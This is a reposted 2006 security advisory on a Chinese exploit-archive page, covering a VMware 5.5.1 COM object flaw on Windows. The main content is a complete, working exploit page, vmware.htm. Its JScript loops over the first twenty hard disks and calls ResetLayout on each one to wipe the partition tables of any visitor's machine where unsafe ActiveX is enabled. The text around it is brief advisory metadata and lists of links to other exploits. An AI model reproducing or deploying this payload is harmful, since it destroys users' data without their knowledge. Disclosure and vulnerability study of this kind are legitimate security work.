首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit
来源:http://www.xsec.org 作者:nop 发布时间:2006-08-18  

<!--

[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue.

Advisory ID:
XSec-06-05

Advisory Name:
VMware 5.5.1 for Windows arbitrary partition table delete issue.

Release Date:
08/16/2006

Tested on:
VMware 5.5.1 build-19175 on Windows Server 2000/2003

Affected version:
VMware 5.5.1

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
On running windows system, you can't delete, format and change system dirver. \
VMware register a COM Object use for Virtual Disk, but it's very danger. \
I don't know how to name this issue. If you allow unsafe ActiveX and jscript, \
and has VMware installed, the vmware.htm will delete all harddisk partition \
table on the windows system. please backup your partition table first.

Exploit:

=============== vmware.htm start ================


// VMware 5.5.1 for Windows arbitrary partition table delete issue.
// Tested on Windows Server 2000/2003
//
// nop nop#xsec.org
// http://www.xsec.org
//

// CLSID: {0F748FDE-0597-443C-8596-71854C5EA20A}
// Info: Vie2Locator Class
// ProgID: VieLib2.Vie2Locator.1
// InprocServer32: C:\Program Files\Common Files\VMware\VMware Virtual Image Editing\vielib.dll

-->

<html><body>
<object classid="clsid:{0F748FDE-0597-443C-8596-71854C5EA20A}" id="vmware"> </object>
<script>

var disk = 0; // HardDisk No

while (disk < 20)
{
var x = vmware.ConnectDisk(disk); // Connect to HardDisk
x.ResetLayout(); // Will clean all partition table on your Harddisk
disk += 1;
}
</script>
</body></html>



 
[推荐] [评论(4条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Windows PNG File IHDR Block
·MS Windows PNG File IHDR Block
·Woltlab Burning Board <= 2.
·CubeCart <= 3.0.11 (oid) Re
·PHP <= 4.4.3 / 5.1.4 (sscan
·MS Windows CanonicalizePathNam
·MS Windows NetpIsRemote() Remo
·MS Windows PNG File IHDR Block
·Internet Explorer (MDAC) Remot
·Macromedia Flash 9 (IE Plugin)
·Opera 9 IRC Client Remote Deni
·Simple Machines Forum <= 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved